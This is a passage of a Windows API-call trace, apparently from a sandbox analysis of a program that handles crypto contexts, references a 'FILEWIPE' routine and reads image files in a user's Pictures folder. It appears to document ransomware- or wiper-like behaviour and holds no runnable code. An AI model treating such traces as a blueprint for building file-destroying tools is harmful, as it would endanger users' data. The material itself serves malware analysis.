hHeap=0x770000) returned 1 [0039.330] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2e8 | out: hHeap=0x770000) returned 1 [0039.330] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0039.330] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0039.330] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0039.330] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2200 [0039.330] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0039.330] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0039.330] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0039.330] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2200 | out: hHeap=0x770000) returned 1 [0039.331] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0039.331] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce38 | out: hHeap=0x770000) returned 1 [0039.331] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1878 | out: hHeap=0x770000) returned 1 [0039.331] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da408 | out: hHeap=0x770000) returned 1 [0039.331] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b98 | out: hHeap=0x770000) returned 1 [0039.331] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc58 | out: hHeap=0x770000) returned 1 [0039.331] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb80 | out: hHeap=0x770000) returned 1 [0039.331] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da288 | out: hHeap=0x770000) returned 1 [0039.331] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1cd8 | out: hHeap=0x770000) returned 1 [0039.331] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce20 | out: hHeap=0x770000) returned 1 [0039.331] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1dc8 | out: hHeap=0x770000) returned 1 [0039.331] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0039.331] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b17d8 | out: hHeap=0x770000) returned 1 [0039.331] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cec8 | out: hHeap=0x770000) returned 1 [0039.331] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c910 | out: hHeap=0x770000) returned 1 [0039.331] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da248 | out: hHeap=0x770000) returned 1 [0039.331] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b8158 | out: hHeap=0x770000) returned 1 [0039.331] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da398 | out: hHeap=0x770000) returned 1 [0039.331] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0039.331] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889490 | out: hHeap=0x770000) returned 1 [0039.331] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da218 | out: hHeap=0x770000) returned 1 [0039.331] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b16c0 | out: hHeap=0x770000) returned 1 [0039.331] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c928 | out: hHeap=0x770000) returned 1 [0039.331] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0039.331] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b20 | out: hHeap=0x770000) returned 1 [0039.331] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd60 | out: hHeap=0x770000) returned 1 [0039.331] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1a08 | out: hHeap=0x770000) returned 1 [0039.331] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c778 | out: hHeap=0x770000) returned 1 [0039.331] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889670 | out: hHeap=0x770000) returned 1 [0039.331] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889b08 | out: hHeap=0x770000) returned 1 [0039.331] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889dd8 | out: hHeap=0x770000) returned 1 [0039.331] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897f0 | out: hHeap=0x770000) returned 1 [0039.331] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cf10 | out: hHeap=0x770000) returned 1 [0039.332] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce80 | out: hHeap=0x770000) returned 1 [0039.332] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1828 | out: hHeap=0x770000) returned 1 [0039.332] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0039.332] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da198 [0039.332] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1828 [0039.332] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0039.332] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1828 | out: hHeap=0x770000) returned 1 [0039.332] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0039.332] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88ce80 [0039.332] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab380 [0039.332] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0039.332] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da198 [0039.332] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0039.332] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0039.332] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0039.332] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0039.332] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cf10 [0039.332] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab338 [0039.332] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0039.332] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0039.332] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da218 [0039.332] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da218 | out: hHeap=0x770000) returned 1 [0039.332] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da218 [0039.332] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae948 [0039.332] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0039.332] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da218 | out: hHeap=0x770000) returned 1 [0039.332] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0039.332] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1828 [0039.332] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x8897f0 [0039.332] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889dd8 [0039.332] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x889b08 [0039.333] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x889670 [0039.333] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88c778 [0039.333] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cd60 [0039.333] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88c928 [0039.333] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x889490 [0039.333] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0039.333] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0039.333] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0039.333] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0039.333] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0039.333] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0039.333] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889dd8 | out: hHeap=0x770000) returned 1 [0039.333] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897f0 | out: hHeap=0x770000) returned 1 [0039.333] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889b08 | out: hHeap=0x770000) returned 1 [0039.333] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889670 | out: hHeap=0x770000) returned 1 [0039.333] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c778 | out: hHeap=0x770000) returned 1 [0039.333] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd60 | out: hHeap=0x770000) returned 1 [0039.333] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c928 | out: hHeap=0x770000) returned 1 [0039.333] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889490 | out: hHeap=0x770000) returned 1 [0039.333] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1828 | out: hHeap=0x770000) returned 1 [0039.333] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0039.333] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab338 | out: hHeap=0x770000) returned 1 [0039.333] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cf10 | out: hHeap=0x770000) returned 1 [0039.333] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0039.333] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0039.333] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da218 [0039.333] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0039.333] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0039.333] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0039.334] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da218 | out: hHeap=0x770000) returned 1 [0039.334] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cf10 [0039.334] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab338 [0039.334] PeekMessageW (in: lpMsg=0x6ae6f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6f4) returned 0 [0039.334] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da218 [0039.334] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da398 [0039.334] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da398 | out: hHeap=0x770000) returned 1 [0039.334] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da218 | out: hHeap=0x770000) returned 1 [0039.334] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab338 | out: hHeap=0x770000) returned 1 [0039.334] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cf10 | out: hHeap=0x770000) returned 1 [0039.334] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da218 [0039.334] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae948 [0039.334] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0039.334] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da218 | out: hHeap=0x770000) returned 1 [0039.334] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0039.334] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2200 [0039.334] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0039.334] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1828 [0039.334] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cf10 [0039.334] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0039.334] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da218 [0039.334] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0039.334] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0039.335] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0039.335] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da218 | out: hHeap=0x770000) returned 1 [0039.335] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x889490 [0039.335] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab338 [0039.335] PeekMessageW (in: lpMsg=0x6ae6e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6e4) returned 0 [0039.335] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da218 [0039.335] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da398 [0039.335] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da398 | out: hHeap=0x770000) returned 1 [0039.335] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da218 | out: hHeap=0x770000) returned 1 [0039.335] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab338 | out: hHeap=0x770000) returned 1 [0039.335] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889490 | out: hHeap=0x770000) returned 1 [0039.335] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0039.335] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889490 [0039.335] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0039.335] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c928 [0039.335] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0039.335] PeekMessageW (in: lpMsg=0x6ae6e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6e4) returned 0 [0039.335] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da218 [0039.335] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da398 [0039.335] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0039.335] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce20 [0039.335] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da218 [0039.335] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da398 [0039.335] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb80 [0039.335] CryptReleaseContext (hProv=0x7d5c40, dwFlags=0x0) returned 1 [0039.335] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2d8 [0039.335] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b8158 [0039.336] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cb80 [0039.336] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce20 [0039.336] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc58 [0039.336] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce38 [0039.336] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da218 [0039.336] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0039.336] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1828 [0039.336] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb80 [0039.336] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2d8 [0039.336] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da198 [0039.336] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0039.336] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0039.336] PeekMessageW (in: lpMsg=0x6ae6e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6e4) returned 0 [0039.336] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0039.336] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da248 [0039.336] FreeLibrary (hLibModule=0x754b0000) returned 1 [0039.336] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0039.336] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0039.336] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0039.336] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2d8 [0039.336] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0039.336] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da248 [0039.336] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae928 [0039.336] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0039.336] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0039.336] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da138 [0039.336] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2d8 [0039.336] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae928 [0039.337] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0039.337] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da318 [0039.337] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1828 [0039.337] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce80 [0039.337] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0039.337] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0039.337] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af408 [0039.337] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b19e0 [0039.337] CharUpperBuffW (in: lpsz="FILEWIPE", cchLength=0x8 | out: lpsz="FILEWIPE") returned 0x8 [0039.337] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0039.337] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af588 [0039.337] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af348 [0039.337] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b15a8 [0039.337] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdf0 [0039.337] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4c8 [0039.337] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889aa8 [0039.337] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0039.337] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af588 [0039.337] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b15a8 [0039.337] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdf0 [0039.338] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af348 [0039.338] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889aa8 [0039.338] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\AfpZd.png", lpFindFileData=0x6ae7a0 | out: lpFindFileData=0x6ae7a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x44d72d00, ftCreationTime.dwHighDateTime=0x1d5b912, ftLastAccessTime.dwLowDateTime=0x9572e040, ftLastAccessTime.dwHighDateTime=0x1d5bcd4, ftLastWriteTime.dwLowDateTime=0x9572e040, ftLastWriteTime.dwHighDateTime=0x1d5bcd4, nFileSizeHigh=0x0, nFileSizeLow=0x5fbe, dwReserved0=0x0, dwReserved1=0x777648, cFileName="AfpZd.png", cAlternateFileName="")) returned 0x7c2240 [0039.338] FindClose (in: hFindFile=0x7c2240 | out: hFindFile=0x7c2240) returned 1 [0039.338] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0039.338] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af348 [0039.338] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1940 [0039.338] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce08 [0039.338] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4c8 [0039.338] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889538 [0039.338] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4f8 [0039.338] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae928 [0039.338] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c808 [0039.338] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cce8 [0039.338] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af7c8 [0039.338] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3f8 [0039.338] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1760 [0039.338] CharLowerBuffW (in: lpsz="byte[24510]", cchLength=0xb | out: lpsz="byte[24510]") returned 0xb [0039.338] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x24) returned 0x7ac350 [0039.338] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c808 [0039.339] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0039.339] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cce8 [0039.339] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af7c8 [0039.339] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891f0 [0039.339] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0039.339] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c868 [0039.339] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0039.339] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0039.339] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0039.339] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c808 [0039.339] CharUpperBuffW (in: lpsz="MEMSET", cchLength=0x6 | out: lpsz="MEMSET") returned 0x6 [0039.339] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0039.339] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1710 [0039.339] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc10 [0039.339] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af538 [0039.339] RtlAllocateHeap 